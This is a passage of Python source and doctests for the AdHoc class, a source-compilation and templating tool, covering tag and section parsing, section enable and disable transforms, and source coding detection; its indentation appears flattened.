Run-time class attributes can be set like this:
| # |adhoc_run_time|
| # |adhoc_enable|
| # RtAdHoc.flat = False
| # RtAdHoc.frozen = True
| # |adhoc_enable|
or like this:
| # |adhoc_run_time|
| if 'RtAdHoc' in globals():
| RtAdHoc.flat = False
| RtAdHoc.frozen = True
**Low-Level Functions**
:meth:`adhoc_tag` constructs a delimited tag or tag regular
expression:
>>> adhoc_tag = AdHoc.adhoc_tag
>>> delimiters = ('<:', ':>')
>>> tag_sym = 'my_tag'
>>> adhoc_tag(tag_sym, delimiters)
'<:my_tag:>'
>>> tag_rx = 'my_[^:]+'
>>> adhoc_tag(tag_rx, delimiters, is_re=True)
'\\\\<\\\\:my_[^:]+\\\\:\\\\>'
:meth:`tag_split` splits a string into tagged line parts and
untagged parts.
:meth:`adhoc_parse_line` splits a tagged line into a tag symbol and
additional arguments:
>>> adhoc_parse_line = AdHoc.adhoc_parse_line
>>> tagged_line = 'anything # <:my_tag:> additonal arguments # end comment'
>>> adhoc_parse_line(tagged_line, tag_sym, delimiters)
('my_tag', 'additonal arguments # end comment')
>>> adhoc_parse_line(tagged_line, tag_rx, delimiters, is_re=True)
('my_tag', 'additonal arguments # end comment')
>>> adhoc_parse_line(tagged_line, tag_rx, delimiters, is_re=True, strip_comment=True)
('my_tag', 'additonal arguments')
**Low-Level Convenience Functions**
*Tag Generation*
:meth:`line_tag`, :meth:`section_tag`
>>> class ah(AdHoc):
... line_delimiters = ('>:', ':<')
... section_delimiters = ('<:', ':>')
>>> ah.line_tag('tag-symbol')
'>:tag-symbol:<'
>>> ah.line_tag('tag.?rx', True)
'\\\\>\\\\:tag.?rx\\\\:\\\\<'
>>> ah.section_tag('tag-symbol')
'<:tag-symbol:>'
>>> ah.section_tag('tag.?rx', True)
'\\\\<\\\\:tag.?rx\\\\:\\\\>'
*Tagged Line/Section Retrieval*
:meth:`tag_lines`, :meth:`tag_partition`, :meth:`tag_sections`
>>> source = AH_CHECK_SOURCE
>>> line_tag = ah.line_tag('cmd')
>>> tagged_lines = ah.tag_lines(source, line_tag)
>>> adhoc_dump_list(tagged_lines, 40)
# :DBG: elt[0] : ]'# >:cmd:< arg0 arg1 # comment\\n'[
# :DBG: elt[1] : ]'# >:cmd:< arg2 arg3 # comment\\n'[
>>> is_re = True
>>> section_tag_rx = ah.section_tag('tag.?', is_re=is_re)
>>> body, sections = ah.tag_partition(source, section_tag_rx, is_re=is_re)
>>> adhoc_dump_list(body, 40)
# :DBG: elt[0] : ]'not in section\\n# >:cmd:< arg0 arg1 # ...'[
# :DBG: elt[1] : ]'not in section\\n'[
# :DBG: elt[2] : ]'not in section\\n'[
>>> adhoc_dump_list(sections, 40)
# :DBG: elt[0] : ]'in section\\n# >:cmd:< arg2 arg3 # comm ...'[
# :DBG: elt[1] : ]'in section\\nin section\\n'[
>>> body, sections = ah.tag_partition(source, section_tag_rx, is_re=is_re, headline=True)
>>> adhoc_dump_sections(sections, 40)
# :DBG: section[0] : ]['# <:tag:> on\\n', 'in section\\n# >:cmd:< arg2 arg3 # comm ...'][
# :DBG: section[1] : ]['# <:tag2:> on\\n', 'in section\\nin section\\n'][
>>> sections = ah.tag_sections(source, section_tag_rx, is_re=is_re, headline=True)
>>> adhoc_dump_sections(sections, 40)
# :DBG: section[0] : ]['# <:tag:> on\\n', 'in section\\n# >:cmd:< arg2 arg3 # comm ...'][
# :DBG: section[1] : ]['# <:tag2:> on\\n', 'in section\\nin section\\n'][
*Tagged Line Parsing*
- :meth:`line_tag_parse`, :meth:`line_tag_strip`
- :meth:`section_tag_parse`, :meth:`section_tag_strip`
>>> strclean(ah.line_tag_parse(tagged_lines[0], 'cmd'))
('cmd', 'arg0 arg1 # comment')
>>> strclean(ah.line_tag_strip(tagged_lines[0], 'cmd', strip_comment=True))
'arg0 arg1'
>>> strclean(ah.section_tag_parse(sections[1][0], 'tag.?', is_re=True))
('tag2', 'on')
>>> strclean(ah.section_tag_strip(sections[1][0], 'tag.?', is_re=True))
'on'
**Tagged Line/Section Transformations**
- :meth:`transform_lines`, :meth:`transform_sections`
- :meth:`line_tag_rename`, :meth:`line_tag_remove`
- :meth:`section_tag_rename`, :meth:`section_tag_remove`
- :meth:`indent_sections`
- :meth:`enable_sections`, :meth:`disable_transform`, :meth:`disable_sections`
- :meth:`remove_sections`
**IO Functions**
- :meth:`check_coding`
- :meth:`decode_source`, :meth:`encode_source`
- :meth:`read_source`, :meth:`write_source`
- :meth:`check_xfile`
- :meth:`pack_file`, :meth:`unpack_file`
**Run-Time Unpack/Import Interface**
- :meth:`unpack_`
- :meth:`import_`, :meth:`module_setup`
**Export Tools**
- :meth:`std_source_param`
- :meth:`export_source`
**Extract Interface**
- :meth:`unpack`
- :meth:`extract`
**Export Interface**
- :meth:`export__`, :meth:`export_`, :meth:`export`
**Dump Interface (Import/Unpack Substitute)**
- :meth:`dump__`, :meth:`dump_`, :meth:`dump_file`
**Macro Interface**
Naive macro expansion would violate the condition
``xsource_i === source_i``.
Here is a simple macro system which preserves the bijectivity
condition. It is quite useful for conditional templating. (See
`Use Cases`_ generator scripts).
*Limitations*
- Macro expansions are not prefixed with the current indentation
- Macros cannot be nested
*Attributes*
- :attr:`macro_call_delimiters`
Delimiters for macros, e.g.: ``@|:MACRO_NAME:|>``
- :attr:`macro_xdef_delimiters`
Delimiters for macro expansion, e.g.::
# <|:adhoc_macro_call\x3a|@
# @|:MACRO_NAME:|>
# <|:adhoc_macro_call\x3a|@
# <|:adhoc_macro_expansion\x3a|@
The macro definition ...
The macro definition ...
# <|:adhoc_macro_expansion\x3a|@
- :attr:`macros`
Macro definitions.
*Methods*
- :meth:`expand_macros`
- :meth:`has_expanded_macros`
- :meth:`activate_macros`
- :meth:`collapse_macros`
**Template Interface**
- :meth:`std_template_param`
- :meth:`get_templates`
- :meth:`template_list`, :meth:`col_param_closure`, :meth:`template_table`
- :meth:`get_named_template`
- :meth:`extract_templates`
**Template Extraction (uncompiled)**
- Expand and activate macros for uncompiled source
- Activate macros on compiled source
**Compile**
- Expand macros before compilation
**Export**
- Collapse macros on export of compiled source.
**Compilation Attributes**
- :attr:`include_path`
**Compilation Interface**
- :meth:`setup_tags`
- :meth:`strquote`
- :meth:`adhoc_run_time_sections_from_string`
- :meth:`adhoc_run_time_section_from_file`
- :meth:`adhoc_get_run_time_section`
- :meth:`prepare_run_time_section`
- :meth:`verbatim_`
- :meth:`include_`
- :meth:`encode_module_`
- :meth:`compile_`
**User API**
- :meth:`encode_include`
- :meth:`encode_module`
- :meth:`compile`
- :meth:`compileFile`
.. \\|:here:|
"""
# @:adhoc_run_time_section:@ on
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Attributes
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
line_delimiters = ('@:', ':@')
# @:adhoc_run_time_section:@ off
'''Tag delimiters for lines.'''
# @:adhoc_run_time_section:@ on
section_delimiters = ('@:', ':@')
# @:adhoc_run_time_section:@ off
'''Tag delimiters for sections.'''
# @:adhoc_run_time_section:@ on
template_process_hooks = {}
# @:adhoc_run_time_section:@ off
'''Dictionary of ``template-name, hook-function`` items.
If the name of a template section matches an item in this
dictionary, the ``hook-function`` is called::
section = hook-function(cls, section, tag, template_name)
'''
# @:adhoc_run_time_section:@ on
extra_templates = []
# @:adhoc_run_time_section:@ off
'''List of additional templates::
[(name, type), ...]
'''
# @:adhoc_run_time_section:@ on
export_dir = '__adhoc__'
# @:adhoc_run_time_section:@ off
'''Export directory (for :meth:`export`, ``--explode``).'''
# @:adhoc_run_time_section:@ on
extract_dir = '.'
# @:adhoc_run_time_section:@ off
'''Export directory (for :meth:`extract`, ``--extract``).'''
# @:adhoc_run_time_section:@ on
flat = True
# @:adhoc_run_time_section:@ off
'''If True, do not export files recursively.'''
# @:adhoc_run_time_section:@ on
forced = False
# @:adhoc_run_time_section:@ off
'''If True, allow duplicate imports.'''
# @:adhoc_run_time_section:@ on
frozen = False
# @:adhoc_run_time_section:@ off
'''If True, do not attempt to load modules from external
sources (\\|:todo:| not implemented).'''
# @:adhoc_run_time_section:@ on
quiet = False
# @:adhoc_run_time_section:@ off
'''If True, suppress warnings.'''
# @:adhoc_run_time_section:@ on
verbose = False
# @:adhoc_run_time_section:@ off
'''If True, display messages.'''
# @:adhoc_run_time_section:@ on
debug = False
# @:adhoc_run_time_section:@ off
'''If True, display debug messages.'''
# @:adhoc_run_time_section:@ on
include_path = []
# @:adhoc_run_time_section:@ off
'''Search path for include files. Only relevant during compilation.'''
# @:adhoc_run_time_section:@ on
export_need_init = {}
export_have_init = {}
extract_warn = False
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Low-Level Functions
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
def _adhoc_string_util():
# @:adhoc_run_time_section:@ off
'''Define string utilities.
- static method :meth:`isstring`
- unicode type :attr:`uc_type`
- static method :meth:`uc`
'''
# @:adhoc_run_time_section:@ on
def isstring(obj):
return isinstance(obj, basestring)
try:
isstring("")
except NameError:
def isstring(obj):
return isinstance(obj, str) or isinstance(obj, bytes)
def _uc(string):
return unicode(string, 'utf-8')
try:
_uc("")
except NameError:
_uc = lambda x: x
uc_type = type(_uc(""))
def uc(value):
if isstring(value) and not isinstance(value, uc_type):
return _uc(value)
return value
return staticmethod(isstring), uc_type, staticmethod(uc)
isstring, uc_type, uc = _adhoc_string_util()
@staticmethod
def adhoc_tag(symbol_or_re, delimiters, is_re=False): # |:fnc:|
# @:adhoc_run_time_section:@ off
'''Make a tag from symbol_or_re and delimiters.
:param symbol_or_re: symbol string or regular expresssion.
:param delimiters: tuple of delimiter strings
``(prefix, suffix)``.
:param is_re: if True, escape the delimiters for regular
expressions.
'''
# @:adhoc_run_time_section:@ on
ldlm = delimiters[0]
rdlm = delimiters[1]
if is_re:
ldlm = re.escape(ldlm)
rdlm = re.escape(rdlm)
return ''.join((ldlm, symbol_or_re, rdlm))
@classmethod
def tag_split(cls, string, tag, is_re=False): # |:fnc:|
# @:adhoc_run_time_section:@ off
"""Split string with tag line.
:returns:
a list of tuples with a flag and a section::
[(is_tag, section), ... ]
**Example**
>>> source = AH_CHECK_SOURCE
>>> printf(str(source), end='')
not in section
# >:cmd:< arg0 arg1 # comment
# <:tag:> on
in section
# >:cmd:< arg2 arg3 # comment
in section
# <:tag:> off
not in section
# <:tag2:> on
in section
in section
# <:tag2:> off
not in section
**Split on literal tag**
>>> is_re = False
>>> tag = AdHoc.adhoc_tag('tag', ('<:', ':>'), is_re)
>>> parts = AdHoc.tag_split(source, tag, is_re)
>>> adhoc_dump_sections(parts, 40)
# :DBG: section[0] : ][False, 'not in section\\n# >:cmd:< arg0 arg1 # ...'][
# :DBG: section[1] : ][True, '# <:tag:> on\\n'][
# :DBG: section[2] : ][False, 'in section\\n# >:cmd:< arg2 arg3 # comm ...'][
# :DBG: section[3] : ][True, '# <:tag:> off\\n'][
# :DBG: section[4] : ][False, 'not in section\\n# <:tag2:> on\\nin secti ...'][
**Split on tag regexp**
>>> is_re = True
>>> tag = AdHoc.adhoc_tag('tag.?', ('<:', ':>'), is_re)
>>> parts = AdHoc.tag_split(source, tag, is_re)
>>> adhoc_dump_sections(parts, 40)
# :DBG: section[0] : ][False, 'not in section\\n# >:cmd:< arg0 arg1 # ...'][
# :DBG: section[1] : ][True, '# <:tag:> on\\n'][
# :DBG: section[2] : ][False, 'in section\\n# >:cmd:< arg2 arg3 # comm ...'][
# :DBG: section[3] : ][True, '# <:tag:> off\\n'][
# :DBG: section[4] : ][False, 'not in section\\n'][
# :DBG: section[5] : ][True, '# <:tag2:> on\\n'][
# :DBG: section[6] : ][False, 'in section\\nin section\\n'][
# :DBG: section[7] : ][True, '# <:tag2:> off\\n'][
# :DBG: section[8] : ][False, 'not in section\\n'][
**Assemble section**
>>> section = []
>>> in_section = False
>>> for part in parts:
... if part[0]:
... in_section = not in_section
... continue
... if in_section:
... section.append(part[1])
>>> section = ''.join(section)
>>> printf(str(section), end='')
in section
# >:cmd:< arg2 arg3 # comment
in section
in section
in section
"""
# @:adhoc_run_time_section:@ on
if not is_re:
tag = re.escape(tag)
ro = re.compile(''.join(('^[^\n]*(', tag, ')[^\n]*$')), re.M)
result = []
last_end = 0
string = cls.decode_source(string)
for mo in re.finditer(ro, string):
start = mo.start(0)
end = mo.end(0)
result.append((False, string[last_end:start]))
result.append((True, string[start:end+1]))
last_end = end+1
result.append((False, string[last_end:]))
return result
@classmethod
def adhoc_parse_line(cls, tagged_line, symbol_or_re=None, # |:clm:|
delimiters=None, is_re=False, strip_comment=None):
# @:adhoc_run_time_section:@ off
"""Parse a tagged line into tag-symbol and argument parts.
:returns: a tuple ``(tag-symbol, tag-arguments)``.
:param tagged_line: string to be parsed.
:param symbol_or_re: symbol string or regular expresssion to
be parsed, default is any sequence of characters except the
first character of the suffix delimiter.
:param delimiters: tuple of delimiter strings
``(prefix, suffix)``. Default is :attr:`line_delimiters`.
:param strip_comment: If True, remove trailing ``#`` comment
from arguments. Default: False.
>>> tagged_line = ' # @:' 'adhoc_test' ':@ arg1 arg2 # comment'
>>> AdHoc.adhoc_parse_line(tagged_line)
('adhoc_test', 'arg1 arg2 # comment')
>>> AdHoc.adhoc_parse_line(tagged_line, 'adhoc_.*', is_re=True)
('adhoc_test', 'arg1 arg2 # comment')
>>> AdHoc.adhoc_parse_line(tagged_line, strip_comment=True)
('adhoc_test', 'arg1 arg2')
>>> AdHoc.adhoc_parse_line(tagged_line.replace('@', '<'))
('', '# <:adhoc_test:< arg1 arg2 # comment')
>>> AdHoc.adhoc_parse_line(tagged_line.replace('@', '|'), delimiters=('|:', ':|'))
('adhoc_test', 'arg1 arg2 # comment')
"""
# @:adhoc_run_time_section:@ on
if delimiters is None:
delimiters = cls.line_delimiters
if symbol_or_re is None:
dlm = delimiters[1]
if dlm:
symbol_or_re = ''.join(('[^', dlm[0], ']+'))
else:
symbol_or_re = ''.join(('[^\\s]+'))
is_re = True
if not is_re:
symbol_or_re = re.escape(symbol_or_re)
tag_rx = cls.adhoc_tag(''.join(('(', symbol_or_re, ')')), delimiters, is_re=True)
mo = re.search(tag_rx, tagged_line)
if mo:
ptag = mo.group(1)
else:
ptag = ''
strip_rx = ''.join(('^.*', tag_rx, '\\s*'))
tag_arg = re.sub(strip_rx, '', tagged_line).strip()
if strip_comment:
tag_arg = re.sub('\\s*#.*', '', tag_arg)
return (ptag, tag_arg)
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Low-Level Convenience Functions
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@classmethod
def set_delimiters(cls, line_delimiters=None, section_delimiters=None): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Set line/section delimiters.
:returns: saved delimiter state suitable for
:meth:`reset_delimiters`.
:param line_delimiters: the line delimiters. If None, line
delimiters are not changed.
:param section_delimiters: the section delimiters. If None,
`line_delimiters` is used.
If both `line_delimiters` and `section_delimiters` are None,
the delimiter state is returned without any modification to
the current delimiters.
>>> AdHoc.set_delimiters()
(('@:', ':@'), ('@:', ':@'))
>>> sv = AdHoc.inc_delimiters()
>>> sv
(('@:', ':@'), ('@:', ':@'))
>>> AdHoc.set_delimiters()
(('@@:', ':@@'), ('@@:', ':@@'))
>>> AdHoc.reset_delimiters(sv)
>>> AdHoc.set_delimiters()
(('@:', ':@'), ('@:', ':@'))
>>> AdHoc.set_delimiters(('<:', ':>'))
(('@:', ':@'), ('@:', ':@'))
>>> AdHoc.set_delimiters()
(('<:', ':>'), ('<:', ':>'))
>>> AdHoc.reset_delimiters(sv)
>>> AdHoc.set_delimiters()
(('@:', ':@'), ('@:', ':@'))
'''
# @:adhoc_run_time_section:@ on
delimiter_state = (cls.line_delimiters, cls.section_delimiters)
if line_delimiters is None:
line_delimiters = delimiter_state[0]
if section_delimiters is None:
section_delimiters = delimiter_state[1]
elif section_delimiters is None:
section_delimiters = line_delimiters
cls.line_delimiters, cls.section_delimiters = (
line_delimiters, section_delimiters)
return delimiter_state
@classmethod
def reset_delimiters(cls, delimiter_state): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Reset line/section delimiters from saved state.
:param delimiter_state: delimiter state as returned by
:meth:`set_delimiters`.
'''
# @:adhoc_run_time_section:@ on
cls.line_delimiters, cls.section_delimiters = delimiter_state
@classmethod
def inc_delimiters(cls): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Duplicate outer delimiter characters.
:returns: saved delimiter state suitable for
:meth:`reset_delimiters`.
E.g.::
"@:", ":@" => "@@:", ":@@"
See :meth:`set_delimiters` for doctest example.
'''
# @:adhoc_run_time_section:@ on
inc_first = lambda dlm: (((not dlm) and ('')) or (dlm[0] + dlm))
inc_last = lambda dlm: (((not dlm) and ('')) or (dlm + dlm[-1]))
outer_delimiters = [(inc_first(dlm[0]), inc_last(dlm[1]))
for dlm in (cls.line_delimiters,
cls.section_delimiters)]
return cls.set_delimiters(*outer_delimiters)
@classmethod
def line_tag(cls, symbol_or_re, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Make a line tag from symbol or regular expression.
:returns: unicode string.
:param symbol_or_re: symbol string or regular expresssion.
:param is_re: if True, escape the delimiters for regular
expressions.
'''
# @:adhoc_run_time_section:@ on
return cls.adhoc_tag(symbol_or_re, cls.line_delimiters, is_re)
@classmethod
def section_tag(cls, symbol_or_re, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Make a section tag from symbol or regular expression.
:returns: unicode string.
:param symbol_or_re: symbol string or regular expresssion.
:param is_re: if True, escape the delimiters for regular
expressions.
'''
# @:adhoc_run_time_section:@ on
return cls.adhoc_tag(symbol_or_re, cls.section_delimiters, is_re)
@classmethod
def tag_lines(cls, string, tag, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
"""Get lines matching tag.
:returns: list of tag lines.
See :meth:`tag_split`.
"""
# @:adhoc_run_time_section:@ on
result = []
for section in cls.tag_split(string, tag, is_re):
if section[0]:
result.append(section[1])
return result
@classmethod
def tag_partition(cls, string, tag, is_re=False, headline=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Split the string into body parts and sections.
If `headline` is True, the starting tag line is included for
sections.'''
# @:adhoc_run_time_section:@ on
in_section = False
body_parts = []
sections = []
tagged_line = ''
for section in cls.tag_split(string, tag, is_re):
if section[0]:
in_section = not in_section
tagged_line = section[1]
continue
if in_section:
if headline:
sections.append((tagged_line, section[1]))
else:
sections.append(section[1])
else:
body_parts.append(section[1])
return body_parts, sections
@classmethod
def tag_sections(cls, string, tag, is_re=False, headline=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Split the string into sections.
If `headline` is True, the starting tag line is included.
See :meth:`tag_partition`.
'''
# @:adhoc_run_time_section:@ on
body_parts, sections = cls.tag_partition(string, tag, is_re, headline)
return sections
@classmethod
def line_tag_parse(cls, tagged_line, symbol_or_re=None, is_re=False, # |:clm:|
strip_comment=None):
# @:adhoc_run_time_section:@ off
"""Parse a line tag line into tag-symbol and argument parts.
:returns: a tuple ``(tag-symbol, tag-arguments)``.
See :meth:`adhoc_parse_line`.
"""
# @:adhoc_run_time_section:@ on
return cls.adhoc_parse_line(tagged_line, symbol_or_re, cls.line_delimiters,
is_re, strip_comment=strip_comment)
@classmethod
def line_tag_strip(cls, tagged_line, symbol_or_re=None, is_re=False, # |:clm:|
strip_comment=None):
# @:adhoc_run_time_section:@ off
"""Remove tag and optionally comment from line tag line.
:returns: tag arguments.
See :meth:`adhoc_parse_line`.
"""
# @:adhoc_run_time_section:@ on
return cls.line_tag_parse(tagged_line, symbol_or_re, is_re, strip_comment)[1]
@classmethod
def section_tag_parse(cls, tagged_line, symbol_or_re=None, is_re=False, # |:clm:|
strip_comment=None):
# @:adhoc_run_time_section:@ off
"""Parse a section tag line into tag-symbol and argument parts.
:returns: a tuple ``(tag-symbol, tag-arguments)``.
See :meth:`adhoc_parse_line`.
"""
# @:adhoc_run_time_section:@ on
return cls.adhoc_parse_line(tagged_line, symbol_or_re, cls.section_delimiters,
is_re, strip_comment=strip_comment)
@classmethod
def section_tag_strip(cls, tagged_line, symbol_or_re=None, is_re=False, # |:clm:|
strip_comment=None):
# @:adhoc_run_time_section:@ off
"""Remove tag and optionally comment from section tag line.
:returns: tag arguments.
See :meth:`adhoc_parse_line`.
"""
# @:adhoc_run_time_section:@ on
return cls.section_tag_parse(tagged_line, symbol_or_re, is_re, strip_comment)[1]
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Tagged Line/Section Transformations
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@classmethod
def transform_lines(cls, transform, string, # |:clm:|
symbol_or_re, is_re=False, delimiters=None):
# @:adhoc_run_time_section:@ off
"""Split string into line tag lines and other sections; call
transform callback on each tagged line.
:returns: transformed string.
:param transform: callback which receives argument ``tagged-line``.
"""
# @:adhoc_run_time_section:@ on
if delimiters is None:
delimiters = cls.line_delimiters
result = []
in_section = False
for section in cls.tag_split(
string, cls.adhoc_tag(symbol_or_re, delimiters, is_re), is_re):
blob = section[1]
if section[0]:
in_section = not in_section
blob = transform(blob)
result.append(blob)
string = ''.join(result)
return string
@classmethod
def transform_sections(cls, transform, string, # |:clm:|
symbol_or_re, is_re=False):
# @:adhoc_run_time_section:@ off
"""Split string into sections and call transform callback on each section.
:returns: transformed string.
:param transform: callback which receives and returns
arguments ``section``, ``headline``.
"""
# @:adhoc_run_time_section:@ on
result = []
in_section = False
headline = ''
for section in cls.tag_split(
string, cls.section_tag(symbol_or_re, is_re), is_re):
blob = section[1]
if section[0]:
in_section = not in_section
if in_section:
headline = blob
continue
elif in_section:
blob, headline = transform(blob, headline)
result.append(headline)
result.append(blob)
string = ''.join(result)
return string
@classmethod
def line_tag_rename(cls, string, symbol_or_re, renamed, is_re=False, delimiters=None): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Rename tag-symbol.
Default tag delimiters are :attr:`line_delimiters`.
>>> tpl = AdHoc.get_named_template("col-param-closure")
.. >>> printf(str(AdHoc.line_tag_rename(tpl, "adhoc_run_time_section", "should_be_kept")))
'''
# @:adhoc_run_time_section:@ on
if is_re:
transform = lambda blob: re.sub(symbol_or_re, renamed, blob)
else:
transform = lambda blob: blob.replace(symbol_or_re, renamed)
return cls.transform_lines(transform, string, symbol_or_re, is_re, delimiters)
@classmethod
def line_tag_remove(cls, string, symbol_or_re, is_re=False, delimiters=None): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Remove tagged lines.
Default tag delimiters are :attr:`line_delimiters`.
>>> tpl = AdHoc.get_named_template("col-param-closure")
.. >>> printf(str(AdHoc.line_tag_remove(tpl, "adhoc_run_time_section")))
'''
# @:adhoc_run_time_section:@ on
transform = lambda blob: ''
return cls.transform_lines(transform, string, symbol_or_re, is_re, delimiters)
@classmethod
def section_tag_rename(cls, string, symbol_or_re, renamed, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Rename tag-symbol of lines tagged with :attr:`section_delimiters`.
>>> tpl = AdHoc.get_named_template("col-param-closure")
>>> res = AdHoc.section_tag_rename(tpl, "adhoc_run_time_section", "should_be_kept")
>>> res = '\\n'.join(res.splitlines()[:4])
>>> printf(str(res)) #doctest: +ELLIPSIS
# @:should_be_kept:@ on
@classmethod
def col_param_closure(cls):...
# @:should_be_kept:@ off
'''
# @:adhoc_run_time_section:@ on
if is_re:
transform = lambda blob: re.sub(symbol_or_re, renamed, blob)
else:
transform = lambda blob: blob.replace(symbol_or_re, renamed)
return cls.transform_lines(transform, string, symbol_or_re, is_re, cls.section_delimiters)
@classmethod
def section_tag_remove(cls, string, symbol_or_re, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Remove lines tagged with :attr:`section_delimiters`.
>>> tpl = AdHoc.get_named_template("col-param-closure")
>>> res = AdHoc.section_tag_remove(tpl, "adhoc_run_time_section")
>>> res = '\\n'.join(res.splitlines()[:4])
>>> printf(str(res)) #doctest: +ELLIPSIS
@classmethod
def col_param_closure(cls):...
...Closure for setting up maximum width, padding and separator
for table columns.
'''
# @:adhoc_run_time_section:@ on
transform = lambda blob: ''
return cls.transform_lines(transform, string, symbol_or_re, is_re, cls.section_delimiters)
@classmethod
def indent_sections(cls, string, symbol_or_re, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''
>>> section = """\\
... # prefix
... # @:adhoc_indent_check:@ +4
... #line 1
... # line 2
... #
... # line 3
... # @:adhoc_indent_check:@
... # suffix\\
... """
>>> printf(AdHoc.indent_sections(section, "adhoc_indent_check"))
# prefix
# @:adhoc_indent_check:@ +4
#line 1
# line 2
#
# line 3
# @:adhoc_indent_check:@
# suffix
>>> printf(AdHoc.indent_sections(section.replace("+4", "-1"),
... "adhoc_indent_check"))
# prefix
# @:adhoc_indent_check:@ -1
#line 1
# line 2
#
# line 3
# @:adhoc_indent_check:@
# suffix
'''
# @:adhoc_run_time_section:@ on
result = []
in_section = False
indent = 0
for section in cls.tag_split(
string, cls.section_tag(symbol_or_re, is_re), is_re):
blob = section[1]
if section[0]:
in_section = not in_section
if in_section:
tag_arg = cls.section_tag_strip(blob)
if tag_arg:
indent = int(tag_arg)
else:
indent = -4
else:
if in_section and indent:
if indent < 0:
rx = re.compile(''.join(('^', ' ' * (-indent))), re.M)
blob = rx.sub('', blob)
elif indent > 0:
rx = re.compile('^', re.M)
blob = rx.sub(' ' * indent, blob)
indent = 0
result.append(blob)
string = ''.join(result)
return string
@classmethod
def enable_sections(cls, string, symbol_or_re, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''
>>> section = """\\
... # prefix
... # @:adhoc_enable_check:@
... #line 1
... # line 2
... #
... # line 3
... # @:adhoc_enable_check:@
... # suffix\\
... """
>>> printf(AdHoc.enable_sections(section, "adhoc_enable_check"))
# prefix
# @:adhoc_enable_check:@
line 1
line 2
<BLANKLINE>
line 3
# @:adhoc_enable_check:@
# suffix
'''
# @:adhoc_run_time_section:@ on
enable_ro = re.compile('^([ \t\r]*)(# ?)', re.M)
enable_sub = '\\1'
transform = lambda blob, hl: (enable_ro.sub(enable_sub, blob), hl)
return cls.transform_sections(transform, string, symbol_or_re, is_re)
adhoc_rx_tab_check = re.compile('^([ ]*\t)', re.M)
adhoc_rx_disable_simple = re.compile('^', re.M)
adhoc_rx_min_indent_check = re.compile('^([ ]*)([^ \t\r\n]|$)', re.M)
@classmethod
def disable_transform(cls, section, headline=None): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Disable section transform callback.'''
# @:adhoc_run_time_section:@ on
if not section:
return (section, headline)
if cls.adhoc_rx_tab_check.search(section):
# tabs are evil
if cls.verbose:
list(map(sys.stderr.write,
('# dt: evil tabs: ', repr(section), '\n')))
return (
cls.adhoc_rx_disable_simple.sub(
'# ', section.rstrip()) + '\n',
headline)
min_indent = ''
for mo in cls.adhoc_rx_min_indent_check.finditer(section):
indent = mo.group(1)
if indent:
if (not min_indent or len(min_indent) > len(indent)):
min_indent = indent
elif mo.group(2):
min_indent = ''
break
adhoc_rx_min_indent = re.compile(
''.join(('^(', min_indent, '|)([^\n]*)$')), re.M)
if section.endswith('\n'):
section = section[:-1]
dsection = []
for mo in adhoc_rx_min_indent.finditer(section):
indent = mo.group(1)
rest = mo.group(2)
if not indent and not rest:
#leave blank lines blank
dsection.append('\n')
else:
dsection.extend((indent, '# ', rest, '\n'))
return (''.join(dsection), headline)
@classmethod
def disable_sections(cls, string, symbol_or_re, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''
>>> section = """\\
... prefix
... @:adhoc_disable_check:@
... line 1
... line 2
...
... line 3
... @:adhoc_disable_check:@
... suffix\\
... """
>>> printf(AdHoc.disable_sections(section, "adhoc_disable_check"))
prefix
@:adhoc_disable_check:@
# line 1
# line 2
<BLANKLINE>
# line 3
@:adhoc_disable_check:@
suffix
'''
# @:adhoc_run_time_section:@ on
return cls.transform_sections(
cls.disable_transform, string, symbol_or_re, is_re)
@classmethod
def remove_sections(cls, string, symbol_or_re, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Remove sections.'''
# @:adhoc_run_time_section:@ on
ah_retained, ah_removed = cls.tag_partition(
string, cls.section_tag(symbol_or_re, is_re), is_re)
return ''.join(ah_retained)
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| IO Functions
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@staticmethod
def check_coding(source): # |:fnc:|
# @:adhoc_run_time_section:@ off
'''Determine coding for source.
:returns: coding type for string.
:param source: source string/unicode.
If the ``source`` string contains a coding specification
within the first two lines, the specified coding is used,
otherwise, ``UTF-8`` is returned.
'''
# @:adhoc_run_time_section:@ on
if source:
eol_seen = 0
for c in source:
if isinstance(c, int):
lt_ = lambda a, b: a < b
chr_ = lambda a: chr(a)
else:
lt_ = lambda a, b: True
chr_ = lambda a: a
break
check = []
for c in source:
if lt_(c, 127):
check.append(chr_(c))
if c == '\n':
eol_seen += 1
if eol_seen == 2:
break
check = ''.join(check)
mo = re.search('-[*]-.*coding:\\s*([^;\\s]+).*-[*]-', check)
else:
mo = None
if mo:
coding = mo.group(1)
else:
coding = 'utf-8'
return coding
@classmethod
def decode_source(cls, source): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Decode source to unicode.
:param source: source string (may already be unicode).
If the ``source`` string contains a coding specification
within the first two lines, the specified coding is used,
otherwise, ``UTF-8`` is applied.
'''
# @:adhoc_run_time_section:@ on
if not source:
return cls.uc('')
if not isinstance(source, cls.uc_type) and hasattr(source, 'decode'):
source = source.decode(cls.check_coding(source))
return source
@classmethod
def encode_source(cls, source): # |:clm:|
# @:adhoc_run_time_section:@ off
